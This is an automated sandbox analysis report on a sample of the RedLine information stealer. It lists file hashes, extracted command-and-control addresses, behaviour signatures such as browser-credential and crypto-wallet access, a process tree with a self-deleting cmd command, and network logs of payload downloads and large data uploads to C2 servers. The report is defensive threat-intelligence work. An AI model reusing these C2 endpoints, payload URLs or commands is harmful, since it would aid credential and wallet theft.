Analysis

  • max time kernel
    62s
  • max time network
    110s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    19-05-2021 18:31

General

  • Target

    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe

  • Size

    1.0MB

  • MD5

    033e13c4aca370aeeb8031dbce7bf0b9

  • SHA1

    406100cd169260cecdf31914d055b612f678b00e

  • SHA256

    3d29b2a1a23b12a5134fbe8b17fe5ba0c87549e5671232eb9e842c2a55ad8f2b

  • SHA512

    4aa49c6b70df63bb022b5c7fcd7aef985c503dd21f6994394a4360a98cba4f3283f2dd8e986d9bf23cfe94425286526fff0f5b296a71c364b7a3e05d639ad00f

Malware Config

Extracted

Family

redline

Botnet

EUMX

C2

tstamore.info:80

Extracted

Family

redline

Botnet

121212

C2

168.119.241.77:60932

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    "C:\Users\Admin\AppData\Local\Temp\3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:3016
    • C:\Users\Admin\AppData\Local\Temp\262124620.exe
      C:\Users\Admin\AppData\Local\Temp\262124620.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3936
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2960
    • C:\Users\Admin\AppData\Local\Temp\2095039246.exe
      C:\Users\Admin\AppData\Local\Temp\2095039246.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1524
      • C:\Users\Admin\AppData\Local\Temp\2095039246.exe
        C:\Users\Admin\AppData\Local\Temp\2095039246.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4004
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2208
      • C:\Windows\SysWOW64\PING.EXE
        ping 0
        3⤵
        • Runs ping.exe
        PID:3392

Network

  • flag-unknown
    DNS
    youwebmaster.com
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    8.8.8.8:53
    Request
    youwebmaster.com
    IN A
    Response
    youwebmaster.com
    IN A
    104.21.12.23
    youwebmaster.com
    IN A
    172.67.151.79
  • flag-unknown
    GET
    http://youwebmaster.com/stats.php?company_id=2&lua=user
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    104.21.12.23:80
    Request
    GET /stats.php?company_id=2&lua=user HTTP/1.1
    User-Agent: Installed OK 1.0/3
    Host: youwebmaster.com
    Response
    HTTP/1.1 302 Found
    Date: Wed, 19 May 2021 18:31:17 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    location: https://iplogger.org/1uSns7
    CF-Cache-Status: DYNAMIC
    cf-request-id: 0a277e89d700004c4ff6a87000000001
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=hNI5d5yllYnmUHSkhLEJatWjnLzGFSZb1SuJIUfpezKE1Bd1rRy5UKN88vuq1eruGgQb83Hu6YVBfiQmvnnkd8YsxWcz%2FZieMbwYlwiTrPDd"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 651f66bc88374c4f-AMS
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
  • flag-unknown
    GET
    http://youwebmaster.com/stats.php?company_id=2
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    104.21.12.23:80
    Request
    GET /stats.php?company_id=2 HTTP/1.1
    User-Agent: Installed OK 1.0/3
    Host: youwebmaster.com
    Response
    HTTP/1.1 302 Found
    Date: Wed, 19 May 2021 18:31:17 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    location: https://iplogger.com/1fnc97
    CF-Cache-Status: DYNAMIC
    cf-request-id: 0a277e8c1700004c4f9e211000000001
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=HYhBmFRA7Rd%2FDd1nTY3SgVUHQumKc1uYEF3209cT3%2F4D6M%2FZcrJhxmBD7eY7mUGPsb9mL%2Bg%2FEkytgZp3knknA9k5V9LtJ%2BnnUklygc3RI4oL"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 651f66c028314c4f-AMS
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
  • flag-unknown
    DNS
    iplogger.org
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    8.8.8.8:53
    Request
    iplogger.org
    IN A
    Response
    iplogger.org
    IN A
    88.99.66.31
  • flag-unknown
    GET
    https://iplogger.org/1uSns7
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    88.99.66.31:443
    Request
    GET /1uSns7 HTTP/1.1
    User-Agent: Installed OK 1.0/3
    Host: iplogger.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 19 May 2021 18:31:17 GMT
    Content-Type: image/png
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=l3g406tjgkipru58f0sni05fq2; path=/; HttpOnly
    Pragma: no-cache
    Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=257599114; path=/
    Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
    Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
    Cache-Control: no-cache
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Answers:
    whoami: 16761f25ab5e605af3b542ca9f459d0220efb97174f3a57492c24d6e698a4be3
    Strict-Transport-Security: max-age=31536000; preload
    X-Frame-Options: DENY
  • flag-unknown
    DNS
    iplogger.com
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    8.8.8.8:53
    Request
    iplogger.com
    IN A
    Response
    iplogger.com
    IN A
    88.99.66.31
  • flag-unknown
    GET
    https://iplogger.com/1fnc97
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    88.99.66.31:443
    Request
    GET /1fnc97 HTTP/1.1
    User-Agent: Installed OK 1.0/3
    Host: iplogger.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 19 May 2021 18:31:18 GMT
    Content-Type: image/png
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=jkjnf9uc1c1ebiodatf2iue711; path=/; HttpOnly
    Pragma: no-cache
    Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=257599113; path=/
    Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
    Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
    Cache-Control: no-cache
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Answers: 1
    whoami: 16761f25ab5e605af3b542ca9f459d0220efb97174f3a57492c24d6e698a4be3
    Strict-Transport-Security: max-age=31536000; preload
    X-Frame-Options: DENY
  • flag-unknown
    DNS
    youwebmaster.net
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    8.8.8.8:53
    Request
    youwebmaster.net
    IN A
    Response
    youwebmaster.net
    IN A
    109.248.175.187
  • flag-unknown
    GET
    http://youwebmaster.net/users/content/id03084901/mmow.txt
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    109.248.175.187:80
    Request
    GET /users/content/id03084901/mmow.txt HTTP/1.1
    User-Agent: Installed OK 1.0/3
    Host: youwebmaster.net
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx/1.14.2
    Date: Wed, 19 May 2021 18:31:18 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 260
    Location: http://youwebmaster.net/function/v2tmp/momomoomomom.php
    Connection: keep-alive
  • flag-unknown
    GET
    http://youwebmaster.net/function/v2tmp/momomoomomom.php
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    109.248.175.187:80
    Request
    GET /function/v2tmp/momomoomomom.php HTTP/1.1
    User-Agent: Installed OK 1.0/3
    Host: youwebmaster.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Wed, 19 May 2021 18:31:18 GMT
    Content-Type: application/octet-stream
    Content-Length: 184832
    Connection: keep-alive
    Content-Disposition: attachment; filename=m.exe
  • flag-unknown
    GET
    http://youwebmaster.net/users/content/id48934920847/eustelopo.txt
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    109.248.175.187:80
    Request
    GET /users/content/id48934920847/eustelopo.txt HTTP/1.1
    User-Agent: Installed OK 1.0/3
    Host: youwebmaster.net
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx/1.14.2
    Date: Wed, 19 May 2021 18:31:19 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 260
    Location: http://youwebmaster.net/function/v2tmp/eueueuueueue.php
    Connection: keep-alive
  • flag-unknown
    GET
    http://youwebmaster.net/function/v2tmp/eueueuueueue.php
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    Remote address:
    109.248.175.187:80
    Request
    GET /function/v2tmp/eueueuueueue.php HTTP/1.1
    User-Agent: Installed OK 1.0/3
    Host: youwebmaster.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Wed, 19 May 2021 18:31:19 GMT
    Content-Type: application/octet-stream
    Content-Length: 387168
    Connection: keep-alive
    Content-Disposition: attachment; filename=DunesMultiMedia.exe
  • flag-unknown
    DNS
    bitrhost.ru
    262124620.exe
    Remote address:
    8.8.8.8:53
    Request
    bitrhost.ru
    IN A
    Response
    bitrhost.ru
    IN A
    217.107.34.191
  • flag-unknown
    GET
    https://bitrhost.ru/SystemDataCommonSchemaInfo50810
    262124620.exe
    Remote address:
    217.107.34.191:443
    Request
    GET /SystemDataCommonSchemaInfo50810 HTTP/1.1
    Host: bitrhost.ru
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Wed, 19 May 2021 18:31:19 GMT
    Content-Type: text/html
    Content-Length: 211216
    Connection: keep-alive
    Server: Jino.ru/mod_pizza
    Last-Modified: Sun, 16 May 2021 09:55:43 GMT
    ETag: "8632df5-33910-5c26f7aee89b6"
    Accept-Ranges: bytes
  • flag-unknown
    DNS
    tstamore.info
    AddInProcess32.exe
    Remote address:
    8.8.8.8:53
    Request
    tstamore.info
    IN A
    Response
    tstamore.info
    IN A
    185.230.141.234
    tstamore.info
    IN A
    185.26.121.195
  • flag-unknown
    POST
    http://tstamore.info//
    AddInProcess32.exe
    Remote address:
    185.230.141.234:80
    Request
    POST // HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
    Host: tstamore.info
    Content-Length: 137
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Wed, 19 May 2021 18:31:25 GMT
    Content-Type: text/xml; charset=utf-8
    Content-Length: 19001
    Connection: keep-alive
  • flag-unknown
    POST
    http://tstamore.info//
    AddInProcess32.exe
    Remote address:
    185.230.141.234:80
    Request
    POST // HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
    Host: tstamore.info
    Content-Length: 580396
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Wed, 19 May 2021 18:31:30 GMT
    Content-Type: text/xml; charset=utf-8
    Content-Length: 150
    Connection: keep-alive
  • flag-unknown
    POST
    http://tstamore.info//
    AddInProcess32.exe
    Remote address:
    185.230.141.234:80
    Request
    POST // HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
    Host: tstamore.info
    Content-Length: 580382
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.2
    Date: Wed, 19 May 2021 18:31:30 GMT
    Content-Type: text/xml; charset=utf-8
    Content-Length: 261
    Connection: keep-alive
  • flag-unknown
    DNS
    api.ip.sb
    2095039246.exe
    Remote address:
    8.8.8.8:53
    Request
    api.ip.sb
    IN A
    Response
    api.ip.sb
    IN CNAME
    api.ip.sb.cdn.cloudflare.net
    api.ip.sb.cdn.cloudflare.net
    IN A
    104.26.13.31
    api.ip.sb.cdn.cloudflare.net
    IN A
    172.67.75.172
    api.ip.sb.cdn.cloudflare.net
    IN A
    104.26.12.31
  • flag-unknown
    GET
    https://api.ip.sb/geoip
    AddInProcess32.exe
    Remote address:
    104.26.13.31:443
    Request
    GET /geoip HTTP/1.1
    Host: api.ip.sb
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Wed, 19 May 2021 18:31:26 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 285
    Connection: keep-alive
    Vary: Accept-Encoding
    Vary: Accept-Encoding
    Cache-Control: no-cache
    Access-Control-Allow-Origin: *
    CF-Cache-Status: DYNAMIC
    cf-request-id: 0a277ead000000d46b471ec000000001
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=I5qG3EkJmN3aBgSKxc6Fs%2Bb8BNNHHB1OJAzMa4gNz4ft16wfgOxNBQ%2BYr0esOSU3G3d3OwjEEDpWA9%2FQWh3Qrr4JNXCHxhEhcwc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Server: cloudflare
    CF-RAY: 651f66f4c938d46b-HAM
  • flag-unknown
    POST
    http://168.119.241.77:60932//
    2095039246.exe
    Remote address:
    168.119.241.77:60932
    Request
    POST // HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
    Host: 168.119.241.77:60932
    Content-Length: 137
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Length: 4656
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-HTTPAPI/2.0
    Date: Wed, 19 May 2021 18:31:42 GMT
  • flag-unknown
    POST
    http://168.119.241.77:60932//
    2095039246.exe
    Remote address:
    168.119.241.77:60932
    Request
    POST // HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
    Host: 168.119.241.77:60932
    Content-Length: 5738765
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Response
    HTTP/1.1 200 OK
    Content-Length: 150
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-HTTPAPI/2.0
    Date: Wed, 19 May 2021 18:31:47 GMT
  • flag-unknown
    POST
    http://168.119.241.77:60932//
    2095039246.exe
    Remote address:
    168.119.241.77:60932
    Request
    POST // HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
    Host: 168.119.241.77:60932
    Content-Length: 5738751
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Response
    HTTP/1.1 200 OK
    Content-Length: 261
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-HTTPAPI/2.0
    Date: Wed, 19 May 2021 18:31:47 GMT
  • flag-unknown
    GET
    https://api.ip.sb/geoip
    2095039246.exe
    Remote address:
    104.26.13.31:443
    Request
    GET /geoip HTTP/1.1
    Host: api.ip.sb
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Wed, 19 May 2021 18:31:43 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 285
    Connection: keep-alive
    Vary: Accept-Encoding
    Vary: Accept-Encoding
    Cache-Control: no-cache
    Access-Control-Allow-Origin: *
    CF-Cache-Status: DYNAMIC
    cf-request-id: 0a277eef2b0000417a1e94f000000001
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=k4Sn1H5W26yYZ02cBaozSTWmqRcNh8sNpUavVOniZ5IVrxc%2FHnTGOxS2c8iSVgJRfYEwYbN8LNM2sh6JvblY18aAVC5QuquBmw8%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Server: cloudflare
    CF-RAY: 651f675eac5e417a-HAM
  • 104.21.12.23:80
    http://youwebmaster.com/stats.php?company_id=2
    http
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    517 B
    1.6kB
    7
    5

    HTTP Request

    GET http://youwebmaster.com/stats.php?company_id=2&lua=user

    HTTP Response

    302

    HTTP Request

    GET http://youwebmaster.com/stats.php?company_id=2

    HTTP Response

    302
  • 88.99.66.31:443
    https://iplogger.org/1uSns7
    tls, http
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    968 B
    6.2kB
    12
    8

    HTTP Request

    GET https://iplogger.org/1uSns7

    HTTP Response

    200
  • 88.99.66.31:443
    https://iplogger.com/1fnc97
    tls, http
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    922 B
    4.5kB
    11
    7

    HTTP Request

    GET https://iplogger.com/1fnc97

    HTTP Response

    200
  • 109.248.175.187:80
    http://youwebmaster.net/function/v2tmp/eueueuueueue.php
    http
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    19.0kB
    589.4kB
    403
    398

    HTTP Request

    GET http://youwebmaster.net/users/content/id03084901/mmow.txt

    HTTP Response

    301

    HTTP Request

    GET http://youwebmaster.net/function/v2tmp/momomoomomom.php

    HTTP Response

    200

    HTTP Request

    GET http://youwebmaster.net/users/content/id48934920847/eustelopo.txt

    HTTP Response

    301

    HTTP Request

    GET http://youwebmaster.net/function/v2tmp/eueueuueueue.php

    HTTP Response

    200
  • 217.107.34.191:443
    https://bitrhost.ru/SystemDataCommonSchemaInfo50810
    tls, http
    262124620.exe
    4.0kB
    221.1kB
    80
    151

    HTTP Request

    GET https://bitrhost.ru/SystemDataCommonSchemaInfo50810

    HTTP Response

    200
  • 185.230.141.234:80
    http://tstamore.info//
    http
    AddInProcess32.exe
    1.2MB
    32.1kB
    810
    304

    HTTP Request

    POST http://tstamore.info//

    HTTP Response

    200

    HTTP Request

    POST http://tstamore.info//

    HTTP Response

    200

    HTTP Request

    POST http://tstamore.info//

    HTTP Response

    200
  • 104.26.13.31:443
    https://api.ip.sb/geoip
    tls, http
    AddInProcess32.exe
    707 B
    4.1kB
    8
    8

    HTTP Request

    GET https://api.ip.sb/geoip

    HTTP Response

    200
  • 168.119.241.77:60932
    http://168.119.241.77:60932//
    http
    2095039246.exe
    11.8MB
    115.9kB
    7871
    2758

    HTTP Request

    POST http://168.119.241.77:60932//

    HTTP Response

    200

    HTTP Request

    POST http://168.119.241.77:60932//

    HTTP Response

    200

    HTTP Request

    POST http://168.119.241.77:60932//

    HTTP Response

    200
  • 104.26.13.31:443
    https://api.ip.sb/geoip
    tls, http
    2095039246.exe
    753 B
    4.1kB
    9
    8

    HTTP Request

    GET https://api.ip.sb/geoip

    HTTP Response

    200
  • 8.8.8.8:53
    youwebmaster.com
    dns
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    62 B
    94 B
    1
    1

    DNS Request

    youwebmaster.com

    DNS Response

    104.21.12.23
    172.67.151.79

  • 8.8.8.8:53
    iplogger.org
    dns
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    58 B
    74 B
    1
    1

    DNS Request

    iplogger.org

    DNS Response

    88.99.66.31

  • 8.8.8.8:53
    iplogger.com
    dns
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    58 B
    74 B
    1
    1

    DNS Request

    iplogger.com

    DNS Response

    88.99.66.31

  • 8.8.8.8:53
    youwebmaster.net
    dns
    3D29B2A1A23B12A5134FBE8B17FE5BA0C87549E567123.exe
    62 B
    78 B
    1
    1

    DNS Request

    youwebmaster.net

    DNS Response

    109.248.175.187

  • 8.8.8.8:53
    bitrhost.ru
    dns
    262124620.exe
    57 B
    73 B
    1
    1

    DNS Request

    bitrhost.ru

    DNS Response

    217.107.34.191

  • 8.8.8.8:53
    tstamore.info
    dns
    AddInProcess32.exe
    59 B
    91 B
    1
    1

    DNS Request

    tstamore.info

    DNS Response

    185.230.141.234
    185.26.121.195

  • 8.8.8.8:53
    api.ip.sb
    dns
    2095039246.exe
    55 B
    145 B
    1
    1

    DNS Request

    api.ip.sb

    DNS Response

    104.26.13.31
    172.67.75.172
    104.26.12.31

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1524-147-0x00000000082F0000-0x00000000082F7000-memory.dmp

    Filesize

    28KB

  • memory/1524-134-0x0000000007D50000-0x0000000007D51000-memory.dmp

    Filesize

    4KB

  • memory/1524-146-0x0000000007D30000-0x0000000007D31000-memory.dmp

    Filesize

    4KB

  • memory/1524-145-0x0000000007B30000-0x0000000007B31000-memory.dmp

    Filesize

    4KB

  • memory/1524-139-0x0000000007850000-0x0000000007D4E000-memory.dmp

    Filesize

    5.0MB

  • memory/1524-136-0x00000000078C0000-0x00000000078C1000-memory.dmp

    Filesize

    4KB

  • memory/1524-135-0x00000000078F0000-0x00000000078F1000-memory.dmp

    Filesize

    4KB

  • memory/1524-132-0x0000000000B40000-0x0000000000B41000-memory.dmp

    Filesize

    4KB

  • memory/2960-130-0x00000000057B0000-0x00000000057B1000-memory.dmp

    Filesize

    4KB

  • memory/2960-127-0x0000000005770000-0x0000000005771000-memory.dmp

    Filesize

    4KB

  • memory/2960-125-0x0000000005C70000-0x0000000005C71000-memory.dmp

    Filesize

    4KB

  • memory/2960-137-0x0000000005A20000-0x0000000005A21000-memory.dmp

    Filesize

    4KB

  • memory/2960-138-0x0000000005660000-0x0000000005C66000-memory.dmp

    Filesize

    6.0MB

  • memory/2960-121-0x0000000000400000-0x000000000041C000-memory.dmp

    Filesize

    112KB

  • memory/2960-142-0x0000000007180000-0x0000000007181000-memory.dmp

    Filesize

    4KB

  • memory/2960-143-0x0000000007880000-0x0000000007881000-memory.dmp

    Filesize

    4KB

  • memory/2960-144-0x0000000006AE0000-0x0000000006AE1000-memory.dmp

    Filesize

    4KB

  • memory/2960-126-0x0000000005710000-0x0000000005711000-memory.dmp

    Filesize

    4KB

  • memory/3936-119-0x0000000005590000-0x0000000005591000-memory.dmp

    Filesize

    4KB

  • memory/3936-117-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

    Filesize

    4KB

  • memory/3936-120-0x0000000002DD0000-0x0000000002DD9000-memory.dmp

    Filesize

    36KB

  • memory/4004-148-0x0000000000400000-0x000000000041C000-memory.dmp

    Filesize

    112KB

  • memory/4004-159-0x0000000006680000-0x0000000006681000-memory.dmp

    Filesize

    4KB

  • memory/4004-163-0x0000000005770000-0x0000000005C6E000-memory.dmp

    Filesize

    5.0MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.